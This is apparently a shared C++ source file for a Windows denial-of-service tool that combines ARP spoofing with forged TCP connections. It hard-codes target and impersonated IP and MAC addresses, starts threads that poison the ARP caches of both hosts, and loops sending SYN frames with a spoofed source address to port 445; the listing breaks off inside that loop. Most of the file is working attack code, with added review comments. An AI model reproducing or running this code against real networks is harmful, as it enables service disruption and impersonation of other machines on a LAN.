
📄 cpp1.cpp

📁 基于ARP欺骗的TCP伪连接D.o.S 本程序是一个基于ARP欺骗上面的DOS工具
// DoS_By_ARPCheat.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "winsock2.h"
#include "Packet32.h"
#include "stdio.h"

#pragma comment(lib, "packet")
#pragma comment(lib, "ws2_32")

// Hard-coded IP and MAC addresses of the hosts the author used for testing.
// The MAC values are 12 hex digits without separators; SendSyn passes them
// through StrToMac to obtain the 6-byte form.
#define SIMULATE_MAC "0011111d735a"     // MAC address of the impersonated host
#define TARGET_MAC "001111c6f7fe"       // MAC address of the target host
#define LOCAL_MAC "00e06e41508f"        // MAC address of the machine running this program
#define TARGET_IP "211.83.97.24"        // IP address of the target host
#define SIMULATE_IP "211.83.97.16"      // IP address of the impersonated host

#define NDIS_PACKET_TYPE_DIRECTED 0x0001 // NDIS packet filter value: directed mode

#pragma pack(push, 1)

// Ethernet II frame header (14 bytes). Declared inside the #pragma pack(push, 1)
// region so the in-memory layout matches the wire layout.
struct ET_HEADER
{
    unsigned char   eh_dst[6];  // destination MAC address
    unsigned char   eh_src[6];  // source MAC address
    unsigned short  eh_type;    // EtherType, stored in network byte order (SendSyn writes htons(0x0800) for IP)
};

// ARP packet body. Declared inside the #pragma pack(push, 1) region.
// No code that fills this struct is visible in this part of the file; the field
// meanings below are inferred from the field names — confirm against ArpCheat.
// NOTE(review): arp_spa/arp_tpa are `unsigned long`, so the layout is only
// correct where long is 32 bits (true for the Windows build this file targets).
struct ARP_HEADER
{
    unsigned short  arp_hdr;    // presumably hardware type
    unsigned short  arp_pro;    // presumably protocol type
    unsigned char   arp_hln;    // presumably hardware address length
    unsigned char   arp_pln;    // presumably protocol address length
    unsigned short  arp_opt;    // presumably operation code
    unsigned char   arp_sha[6]; // presumably sender hardware (MAC) address
    unsigned long   arp_spa;    // presumably sender protocol (IPv4) address
    unsigned char   arp_tha[6]; // presumably target hardware (MAC) address
    unsigned long   arp_tpa;    // presumably target protocol (IPv4) address
};

// IPv4 header without options. Declared inside the #pragma pack(push, 1) region.
// Multi-byte fields are written in network byte order by SendSyn.
struct IP_HEADER
{
    char m_ver_hlen;      // 4-bit version, 4-bit header length (SendSyn writes 4<<4|5)
    char m_tos;           // type of service (SendSyn writes 0)
    USHORT m_tlen;        // total length of IP header plus payload
    USHORT m_ident;       // identification; SendSyn fills it from the global ipID counter
    USHORT m_flag_frag;     // 3 flag bits (1 unused, DF, MF) and 13-bit fragment offset
    char m_ttl;           // time to live; NOTE(review): plain char, SendSyn stores 128 here
    char m_protocol;      // upper-layer protocol (SendSyn writes IPPROTO_TCP)
    USHORT m_cksum;       // header checksum, produced by CheckSum over this struct
    ULONG m_sIP;          // source IPv4 address (inet_addr result)
    ULONG m_dIP;          // destination IPv4 address (inet_addr result)
};

// Fixed 20-byte TCP header. Declared inside the #pragma pack(push, 1) region.
struct TCP_HEADER
{
    USHORT m_sport;                // source port, network byte order
    USHORT m_dport;                // destination port, network byte order
    ULONG m_seq;                   // sequence number
    ULONG m_ack;                   // acknowledgement number
    char m_hlen_res4;              // 4-bit TCP header length (in 32-bit words), first 4 of the 6 reserved bits
    char m_res2_flag;              // last 2 of the 6 reserved bits, then the 6 flag bits (SendSyn writes 2 = SYN)
    USHORT m_win;                  // window size, network byte order
    USHORT m_cksum;                // checksum over pseudo-header, TCP header and options
    USHORT m_urp;                  // urgent pointer
};

// TCP pseudo-header. It is never transmitted; SendSyn places it in front of the
// TCP header and options only to compute the TCP checksum.
struct PSD_HEADER
{
    ULONG m_saddr; // source address
    ULONG m_daddr; // destination address
    char m_mbz;    // set to 0 by SendSyn
    char m_ptcl;   // protocol type (SendSyn writes IPPROTO_TCP)
    USHORT m_tcpl; // TCP length (header plus options), network byte order
};

// TCP options block (8 bytes) appended to the SYN segment for option negotiation
// with the peer. Declared inside the #pragma pack(push, 1) region.
struct TCP_OPTION
{
    USHORT unKnown;        // SendSyn writes htons(516) = bytes 0x02 0x04, i.e. option kind 2 (MSS), length 4
    USHORT maxSegSize;     // MSS value; typically 1460 on Ethernet
    char no1;              // SendSyn writes 1 (option kind 1, NOP padding)
    char no2;              // SendSyn writes 1 (option kind 1, NOP padding)
    USHORT SACK;           // SendSyn writes htons(1026) = bytes 0x04 0x02, i.e. option kind 4 (SACK permitted), length 2
};

// Parameter block handed to the ArpCheat thread. main() zero-initialises it and
// copies the strings in without their terminators, so each array must be larger
// than the text it holds for the value to stay NUL-terminated.
struct CHEAT_ARP_INFO
{
    char simulateIP[20];   // dotted-decimal IPv4 address of the impersonated host
    char targetIP[20];     // dotted-decimal IPv4 address of the target host
    char targetMAC[13];    // target MAC as 12 hex digits plus terminating NUL
};

#pragma pack(pop)

// Forward declarations. Only main and part of SendSyn are defined in this part
// of the file; the descriptions below come from the declarations and call sites.
USHORT CheckSum(USHORT *buffer, int size);   // computes the checksum used for the IP and TCP headers
void StrToMac(char *str,char *mac);          // converts a hex string to a MAC address
void ListenACK();                            // listening routine: watches for the peer's reply packets
void AssayAndSendData(LPPACKET lpPacket);    // analyses a captured frame and sends a reply
DWORD WINAPI ArpCheat(void *pInfo);          // ARP spoofing thread; main passes a CHEAT_ARP_INFO*
DWORD WINAPI SendSyn(void *no);              // thread that sends the SYN frames; argument unused by the visible code
void Info();                                 // called first in main; definition not visible here

// Process-wide state. main writes lpAdapter once before starting any thread;
// ipID and sourcePort are incremented by SendSyn for every frame it builds.
// NOTE(review): no synchronisation is visible on these globals — confirm whether
// any other thread also modifies them.
LPADAPTER lpAdapter=NULL;                    // handle of the opened capture adapter
USHORT ipID=1638;                            // next IP identification value
USHORT sourcePort=1056;                      // first source port; increases per SYN
USHORT targetPort=445;                       // destination port

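/*
 * Program entry point.
 *
 * Initialises Winsock, asks the packet driver for its adapter list, opens the
 * first adapter, starts two ArpCheat threads (one per direction between the
 * target and the impersonated host) and one SendSyn thread, then blocks in
 * ListenACK().
 *
 * Changes against the original listing:
 *   - the adapter-name parser no longer reads adapter_name[-1] when the list is
 *     empty, and no longer writes past adapter_list[] when the driver reports
 *     more than 10 adapters or a name longer than one slot;
 *   - WSACleanup() is now called on the start-up failure paths as well.
 *
 * On the wire this shows up as unsolicited ARP traffic for the two configured
 * addresses plus a stream of SYN segments with a steadily increasing source
 * port; ARP inspection on the switch and SYN cookies on the target are the
 * controls that address those two behaviours.
 *
 * Returns 0 after ListenACK() returns, -1 on any start-up failure.
 */
int main(int argc, char* argv[])
{
    Info();

    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
    {
        printf("WSAStartup error!\n");
        return -1;
    }

    // Open the adapter.
    // adapter_name receives the adapter-name list. adapter_length (1024) is
    // smaller than the buffer itself, so the driver cannot write past its end.
    WCHAR adapter_name[2048]={0};
    ULONG adapter_length=1024;

    // Fetch the names of all adapters.
    if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
    {
        // adapter_name: buffer that receives the adapter names
        // adapter_length: size reported for that buffer
        printf("PacketGetAdapterNames error:%d\n",GetLastError());
        ::WSACleanup();
        return -1;
    }

    // Split the list into adapter_list[], index 0 being the first adapter.
    // The list is parsed as NUL-separated wide strings ending in an empty string.
    // NOTE(review): some Packet32 builds return narrow strings instead — confirm
    // against the library version this is linked with.
    // adapter_list is static, hence zero-filled; copying at most
    // (slot size - one WCHAR) bytes keeps every entry NUL-terminated.
    static CHAR adapter_list[10][1024];
    const ULONG maxAdapters=sizeof(adapter_list)/sizeof(adapter_list[0]);
    const size_t maxNameBytes=sizeof(adapter_list[0])-sizeof(WCHAR);
    const WCHAR *listEnd=adapter_name+sizeof(adapter_name)/sizeof(adapter_name[0]);
    const WCHAR *cursor=adapter_name;
    ULONG adapterCount=0;

    while(cursor<listEnd && *cursor!=L'\0' && adapterCount<maxAdapters)
    {
        // Find the end of the current name without leaving the buffer.
        const WCHAR *nameEnd=cursor;
        while(nameEnd<listEnd && *nameEnd!=L'\0')
            nameEnd++;

        size_t nameBytes=sizeof(WCHAR)*static_cast<size_t>(nameEnd-cursor);
        if(nameBytes>maxNameBytes)
            nameBytes=maxNameBytes;     // truncate rather than overflow the slot
        memcpy(adapter_list[adapterCount],cursor,nameBytes);
        adapterCount++;

        if(nameEnd>=listEnd)
            break;                      // unterminated final name: stop here
        cursor=nameEnd+1;
    }

    // Open the first adapter by default. With an empty list adapter_list[0] is
    // an empty string and the open call is left to report the failure.
    lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
    if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
        ::WSACleanup();
        return -1;
    }

    // Create the ARP spoofing threads.
    // info1/info2 live on main's stack and are passed by pointer; they stay valid
    // because main remains blocked in ListenACK() below while the threads run.
    CHEAT_ARP_INFO info1={0},info2={0};
    memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
    memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
    memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
    ::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);

    memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
    memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
    memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
    ::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
    Sleep(50);

    // Start the thread that sends the SYN frames.
    ::CreateThread(NULL,0,SendSyn,NULL,0,NULL);

    ListenACK();      // loops, listening for packets
    PacketCloseAdapter(lpAdapter);  // close the adapter
    ::WSACleanup();
    return 0;
}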

DWORD WINAPI SendSyn(void *no)
{
    Sleep(100);

    while(TRUE)     //循环发送SYN包发起伪连接
    {
        char s_mac[6]={0},d_mac[6]={0};
        char sendSynBuf[128]={0};
        ET_HEADER et_header={0};
        IP_HEADER ip_header={0};
        TCP_HEADER tcp_header={0};
        TCP_OPTION tcp_option={0};
        PSD_HEADER psd_header={0};

        //填充以太头部:
        StrToMac(LOCAL_MAC,s_mac);    //local_mac
        memcpy(et_header.eh_src,s_mac,6);
        StrToMac(TARGET_MAC,d_mac);    //dest_mac
        memcpy(et_header.eh_dst,d_mac,6);
        et_header.eh_type=htons(0x0800);  //类型为0x0800表示这是IP包

        //填充IP头部:
        ip_header.m_ver_hlen=(4<<4|5);
        ip_header.m_tos=0;
        ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
        ip_header.m_ident=htons(ipID++);
        ip_header.m_flag_frag=htons(16384); //设置为不分片
        ip_header.m_ttl=128;
        ip_header.m_protocol=IPPROTO_TCP;   //高层协议为TCP
        ip_header.m_cksum=0;
        ip_header.m_sIP=inet_addr(SIMULATE_IP);   //源IP填为伪装主机的IP
        ip_header.m_dIP=inet_addr(TARGET_IP);     //目的IP

        ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));

        //填充TCP头部以及TCP选项:
        tcp_header.m_dport=htons(targetPort);
        tcp_header.m_sport=htons(sourcePort++);
        tcp_header.m_seq=::GetTickCount();   //初始化序列号
        tcp_header.m_ack=0;
        tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
        tcp_header.m_res2_flag=2;      //标识为SYN包
        tcp_header.m_win=htons(16384);
        tcp_header.m_cksum=0;
        tcp_header.m_urp=0;

        tcp_option.unKnown=htons(516);
        tcp_option.maxSegSize=htons(1460);   //MSS,以太网一般为1460
        tcp_option.no1=1;
        tcp_option.no2=1;
        tcp_option.SACK=htons(1026);

        //计算TCP校验和:
        psd_header.m_daddr=ip_header.m_dIP;
        psd_header.m_saddr=ip_header.m_sIP;
        psd_header.m_mbz=0;
        psd_header.m_ptcl=IPPROTO_TCP;
        psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));

        char tcpBuf[128]={0};
        memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
        memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
        memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
        tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));

        //构造SYN数据帧:
        memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
        memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
        memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
        memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));

        //发送伪造的SYN包:
        LPPACKET lpPacket;
        lpPacket=PacketAllocatePacket();     //给PACKET结构指针分配内存
        PacketInitPacket(lpPacket,sendSynBuf,128);   //初始化PACKET结构指针

        if(PacketSetNumWrites(lpAdapter,1)==FALSE)   //设置发送次数
        {
            printf("Warning: Unable to send more than one packet in a single write!\n");
            continue;
        }

        if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)  
        {
